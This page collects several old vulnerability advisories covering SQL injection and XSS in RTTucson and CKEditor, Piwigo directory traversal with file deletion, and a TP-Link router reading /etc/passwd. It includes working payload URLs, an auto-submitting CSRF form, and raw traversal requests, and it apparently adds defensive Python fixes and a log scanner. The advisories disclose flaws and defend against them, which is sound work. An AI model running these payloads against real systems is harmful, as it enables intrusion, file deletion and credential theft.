RTTucson Quotations Database – Multiple Vulnerabilities

RTTucson Quotations Database – Multiple vulnerabilities have been found; the discoverer's assessment is as follows:

##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ _________ _
 __  / / __ `/ __ / / ___/ ___/ __ `/ ___/ / _ / ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
____/__,_/_/ /_/_/____/____/__,_/_/  /_/___/____(_)____/_/   __, /  
                                                                /____/   
##################################################################################                                                                                                                              
RTTucson Quotations Database Script, Multiple Vulnerabilities
Software Page: http://www.rttucson.com/index.html
Script Demo: http://www.rttucson.com/quotations/default.php

Author(Pentester): 3spi0n
On Social: 
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site 

[ ] (author.php, ID Param)
> > >  http://server/quotations/author.php?ID=5' (MySQLi Found)

[ ] (category_quotes.php, ID Param)
> > >  http://server/quotations/category_quotes.php?ID=9' (MySQLi Found)

[~] XSS on Demo Site

> >  (quote_search.php, keywords Param)
> > >  http://server/quotations/quote_search.php?keywords= <h1> Xssed-3spi0n </h1> 

CKEditor 4.0.1 – Multiple Vulnerabilities

CKEditor 4.0.1 – General vulnerabilities have been found in this version; the assessment of the vulnerability is as follows.

===========================================
Vulnerable Software: ckeditor 4.0.1 standard
Download: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
Vulns: Full Path Disclosure && XSS
===========================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
Vulnerable Code: /ckeditor/samples/assets/posteddata.php
=============SNIP BEGINS====================

root:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
    <meta charset="utf-8">
    <title>Download</title>
    <link rel="stylesheet" href="sample.css">
</head>
<body>
    <h1>
        CKEditor &mdash; Posted Data
    </h1>
    <table border="1" cellspacing="0" id="outputSample">
        <colgroup><col width="120"></colgroup>
        <thead>
            <tr>
                <th>Field&nbsp;Name</th>
                <th>Value</th>
            </tr>
        </thead>
<?php

if ( isset( $_POST ) )
    $postArray = &$_POST ;              // 4.1.0 or later, use $_POST
else
    $postArray = &$HTTP_POST_VARS ;     // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value )
{
    if ( get_magic_quotes_gpc() )
        $postedValue = htmlspecialchars( stripslashes( $value ) ) ;
    else
        $postedValue = htmlspecialchars( $value ) ;

?>
        <tr>
            <th style="vertical-align: top"><?php echo $sForm?></th>
            <td><pre><?php echo $postedValue?></pre></td>
        </tr>
    <?php } ?>
    </table>
    <div id="footer">
        <hr>
        <p>
            CKEditor - The text editor for the Internet - <a href="http://ckeditor.com/">http://ckeditor.com</a>
        </p>
        <p id="copy">
            Copyright &copy; 2003-2013, <a href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
        </p>
    </div>
</body>
</html>

=============SNIP ENDS HERE====================


FULL Path Disclosure example:

URL: http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php
METHOD: $_POST

HEADERS:

Host: hacker1.own
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30


$_POST DATA TO SEND:

bangbangbang[]=PATH DISCLOSURE


Result: Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38

Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png

=================================================

CSRF+XSS

<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF">
</form>

=================================================

Print Screen: http://i062.radikal.ru/1302/e6/25ef023dd589.png


=================================================
And here is fixed version: /ckeditor/samples/assets/posteddata.php

================SNIP BEGINS=======================
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
  <meta charset="utf-8">
  <title>Sample &mdash; CKEditor</title>
  <link rel="stylesheet" href="sample.css">
</head>
<body>
  <h1>
    CKEditor &mdash; Posted Data
  </h1>
  <table border="1" cellspacing="0" id="outputSample">
    <colgroup><col width="120"></colgroup>
    <thead>
      <tr>
        <th>Field&nbsp;Name</th>
        <th>Value</th>
      </tr>
    </thead>
<?php

if ( isset( $_POST ) )
  $postArray = &$_POST ;            // 4.1.0 or later, use $_POST
else
  $postArray = &$HTTP_POST_VARS ;   // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value )
{
  if ( get_magic_quotes_gpc() )
    $postedValue = htmlspecialchars( stripslashes( (string) $value ) ) ;
  else
    $postedValue = htmlspecialchars( (string) $value ) ;

?>
    <tr>
      <th style="vertical-align: top"><?php echo htmlspecialchars( (string) $sForm ); ?></th>
      <td><pre><?php echo $postedValue?></pre></td>
    </tr>
  <?php } ?>
  </table>
  <div id="footer">
    <hr>
    <p>
      CKEditor - The text editor for the Internet - <a href="http://ckeditor.com/">http://ckeditor.com</a>
    </p>
    <p id="copy">
      Copyright &copy; 2003-2013, <a href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
    </p>
  </div>
</body>
</html>

=============ENJOYYY====================
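The fixed file above casts each value to string before escaping it, which stops the htmlspecialchars() warning (and with it the path disclosure) but renders an array-valued field as the literal word "Array". The Python below is an added example, not CKSource's code and not part of the advisory: it mirrors the same rendering step and goes one step further by expanding array-valued fields (PHP's name[]=x form) into one row per element and escaping the field name as well as the value, which is exactly what the CSRF+XSS form above relies on being absent. SAMPLE_POST is a constructed request body.

```python
import html
from typing import Any, Iterable, List, Tuple

# Constructed request body: the array-valued field from the path-disclosure
# request, an ordinary editor field, and a field whose *name* carries markup,
# as in the CSRF+XSS form above.
SAMPLE_POST = {
    "bangbangbang": ["PATH DISCLOSURE"],
    "editor1": "<p>hello &amp; goodbye</p>",
    "<script>alert('AkaStep');</script>": "SENDF",
}


def flatten(name: str, value: Any) -> Iterable[Tuple[str, str]]:
    """Yield (field, scalar) pairs. PHP's request parser turns name[]=x into an
    array; the vulnerable sample handed that array straight to htmlspecialchars().
    Here an array becomes one row per element (name[0], name[1], ...) and only
    scalars ever reach the escaper, so no type warning can be triggered."""
    if isinstance(value, dict):
        for key, item in value.items():
            yield from flatten(f"{name}[{key}]", item)
    elif isinstance(value, (list, tuple)):
        for index, item in enumerate(value):
            yield from flatten(f"{name}[{index}]", item)
    else:
        yield name, str(value)


def render_rows(post: dict) -> List[str]:
    """Build the <tr> rows of the posted-data table. Both the field name and the
    value are escaped; the original sample echoed $sForm unescaped, which is the
    XSS the advisory demonstrates with a <script> tag in the field name."""
    rows = []
    for name, value in post.items():
        for field, scalar in flatten(name, value):
            rows.append(
                "<tr><th>%s</th><td><pre>%s</pre></td></tr>"
                % (html.escape(field), html.escape(scalar))
            )
    return rows


def contains_raw_markup(rows: List[str]) -> bool:
    """True if any attacker-controlled text survived as live markup."""
    return any("<script" in row.lower() or "onerror" in row.lower() for row in rows)


if __name__ == "__main__":
    for row in render_rows(SAMPLE_POST):
        print(row)
```

The warning reached the browser in the first place only because the test server displayed PHP errors in the response; independent of the code fix, a production PHP configuration with display_errors=Off and log_errors=On keeps such messages (and the absolute paths they carry) in the server's error log rather than in the page.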

KUDOSSSSSSS ========================================= packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE ===========================================

/AkaStep

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability

A Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete vulnerability has been found; the discoverer's assessment of the vulnerability is as follows:

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability


Vendor: Piwigo project
Product web page: http://www.piwigo.org
Affected version: 2.4.6

Summary: Piwigo is a photo gallery software for the web that comes
with powerful features to publish and manage your collection of
pictures.

Desc: Input passed to the 'dl' parameter in 'install.php' script
is not properly sanitised before being used to get the contents of
a resource or delete files. This can be exploited to read and delete
arbitrary data from local resources with the permissions of the web
server via directory traversal attack.

====================================================================
/install.php:
-------------

113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
122:   unlink($filename);
123:   exit();
124: }

====================================================================
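The listing above builds the file name by concatenating a prefix with the raw 'dl' value and then reads and unlinks it; the only check is file_exists(), which a traversal sequence passes. The Python below is an added example, not Piwigo's code and not the vendor patch: it shows the two checks such a download handler needs, an allow-list on the parameter itself and a realpath-based containment test on the resulting path, exercised against a constructed directory layout (root/_data/pwg_db.sql as the legitimate export, root/secret.txt standing in for any file outside the data directory).

```python
import os
import re
import tempfile

# Allow-list for the dl parameter: a plain token with at most one extension,
# so "..", "/" and "\" can never appear. The install step only ever needs to
# hand back the export it just wrote, so a tight pattern costs nothing.
SAFE_DL = re.compile(r"^[A-Za-z0-9_-]{1,64}(\.[A-Za-z0-9]{1,8})?$")


class Rejected(Exception):
    """Raised when the requested download must not be served."""


def contained(base_dir: str, candidate: str) -> bool:
    """Realpath-based containment: resolves symlinks and '..' on both sides
    before comparing, so a value that slipped past a lexical filter still
    cannot reach outside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    return os.path.commonpath([base, target]) == base


def resolve_download(root: str, data_location: str, dl: str) -> str:
    """Return the absolute path of pwg_<dl> inside root/data_location, or raise.
    Mirrors the advisory's PHPWG_ROOT_PATH . data_location . 'pwg_' . dl
    construction, with the checks the original lacked."""
    if not SAFE_DL.match(dl):
        raise Rejected("dl must be a plain file token")
    data_dir = os.path.join(root, data_location)
    candidate = os.path.join(data_dir, "pwg_" + dl)
    if not contained(data_dir, candidate):
        raise Rejected("path escapes the data directory")
    if not os.path.isfile(candidate):
        raise Rejected("no such export")
    return os.path.realpath(candidate)


def demo() -> dict:
    """Constructed layout; returns what each dl value resolves to."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "_data"))
        with open(os.path.join(root, "_data", "pwg_db.sql"), "w") as fh:
            fh.write("-- constructed export\n")
        with open(os.path.join(root, "secret.txt"), "w") as fh:
            fh.write("constructed secret\n")
        for dl in ("db.sql", "../../../secret.txt", "missing"):
            try:
                results[dl] = os.path.basename(resolve_download(root, "_data/", dl))
            except Rejected as exc:
                results[dl] = "rejected: " + str(exc)
        # The containment check on its own, for a path that dodged the regex:
        # pwg_../../../secret.txt normalises to root/secret.txt, outside _data.
        results["contained"] = contained(
            os.path.join(root, "_data"),
            os.path.join(root, "_data", "pwg_../../../secret.txt"),
        )
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r:>24} -> {value}")
```

Note that the prefix "pwg_" gives no protection on its own: the first ".." in the parameter simply removes the "pwg_.." component, after which every further ".." climbs a directory, which is why the advisory's PoC needs several of them. Because the original handler also deletes the file it serves, the containment check matters twice: once for what is read and once for what is unlinked.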


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic


Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php

Vendor Patch: http://piwigo.org/bugs/view.php?id=2843



15.02.2013


--

http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt

Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Exploit

Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Python Exploit

TP-Link TL-WA701N / TL-WA701ND – Multiple Vulnerabilities

TP-Link TL-WA701N / TL-WA701ND – Vulnerabilities have been found in these routers; through them /etc/passwd can be read, and an XSS vulnerability is also present.

Device Name: TL-WA701N / TL-WA701ND
Vendor: TP-Link

============ Vulnerable Firmware Releases: ============

Firmware Version: 3.12.6 Build 110210 Rel.37112n
Firmware Version: 3.12.16 Build 120228 Rel.37317n - Published Date 2/28/2012
Hardware Version: WA701N v1 00000000
Model No.: TL-WA701N / TL-WA701ND

Firmware download: http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1

============ Vulnerability Overview: ============

    * Directory Traversal: 

Access local files of the device. For example you could read /etc/passwd and /etc/shadow.

Request:
GET /help/../../etc/passwd HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.2/help/

==> >  no authentication needed!!!

Response:
HTTP/1.1 200 OK
Server: TP-LINK Router
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N"
Content-Type: text/html

 <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> 
 <HTML> 
 <HEAD>  <TITLE> TL-WA701N </TITLE> 
 <META http-equiv=Pragma content=no-cache> 
 <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> 
 <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> 
 <SCRIPT language="javascript" type="text/javascript">  <!--
if(window.parent == window){window.location.href="http://192.168.178.2";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//-->  </SCRIPT> 
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/TP-Link-directory-traversal.png

This traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

    * The request for changing the password is a HTTP GET and the username and password are parameters of this HTTP GET: 

http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save
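Since the advisory lists no vendor fix, the practical defender-side options are to keep the management interface off untrusted networks and to spot these requests in proxy or access logs. The Python below is an added example, not part of Michael Messner's advisory and not TP-Link code: it scans constructed request lines (two of them mirror the requests shown above) and reports two things, a path whose ".." sequences climb above the web root, and a GET whose query string carries the password-change parameters, which the device's design places into browser history, Referer headers and every log on the path. It goes slightly beyond the page by also decoding percent-encoded dots, which a plain search for "../" would miss.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed request lines in "METHOD target" form. The first and fourth
# mirror requests in the advisory; the third is a percent-encoded variant.
SAMPLE_LOG = """\
GET /help/../../etc/passwd
GET /help/help_hm.htm
GET /help/%2e%2e/%2e%2e/etc/shadow
GET /userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save
GET /dynaform/css_help.css
"""

# Parameters that should never travel in a query string.
SENSITIVE_PARAMS = {"oldpassword", "newpassword", "newpassword2"}


def escapes_root(path: str) -> bool:
    """Walk the decoded path and report whether '..' ever climbs above the web
    root. Decoding twice also catches %252e-style double encoding."""
    depth = 0
    for part in unquote(unquote(path)).split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part and part != ".":
            depth += 1
    return False


def analyse(line: str) -> list:
    """Findings for one request line; an empty list means nothing flagged."""
    method, _, target = line.strip().partition(" ")
    parts = urlsplit(target)
    findings = []
    if escapes_root(parts.path):
        findings.append("traversal")
    if method == "GET":
        leaked = sorted(
            key for key in parse_qs(parts.query, keep_blank_values=True)
            if key.lower() in SENSITIVE_PARAMS
        )
        if leaked:
            findings.append("credentials-in-query:" + ",".join(leaked))
    return findings


def scan(log: str) -> dict:
    """Map each non-empty request line to its findings."""
    return {line: analyse(line) for line in log.splitlines() if line.strip()}


if __name__ == "__main__":
    for request, findings in scan(SAMPLE_LOG).items():
        print(f"{findings or ['ok']!s:<60} {request}")
```

The depth counter is deliberately used instead of a normalising call such as posixpath.normpath, which would quietly fold "/help/../../etc/passwd" into "/etc/passwd" and lose the fact that the request climbed above the root at all; the response in the advisory shows that the device's own handler did no such normalisation either.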

    * Stored XSS: 

Injecting scripts into the parameter Desc reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

->  Wireless MAC Filtering ->  Add or Modify ->  put your XSS in the description (parameter Desc)

Example Request:
http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc="><img src="0" onerror=alert(1)> &Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save

This XSS vulnerability was already documented on another device and firmware version: http://www.exploit-db.com/exploits/19774/

    * Stored XSS: 

->  System Tools ->  SNMP:

Injecting scripts into the parameter sys_name and sys_location reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

http://192.168.178.2/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name= </script> &sys_location= <script> alert('XSSed') </script> &get_community=111&get_source=123&set_community=123&set_source=111&Save=Save

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-011
Twitter: 

The traversal vulnerability was already reported on some other TP-Link devices: https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

The stored XSS vulnerability in the Desc parameter was already documented on another device and firmware version: http://www.exploit-db.com/exploits/19774/

============ Time Line: ============

August 2012 - discovered vulnerability
06.08.2012 - reported vulnerability to TP-Link
14.02.2013 - public release

===================== Advisory end =====================
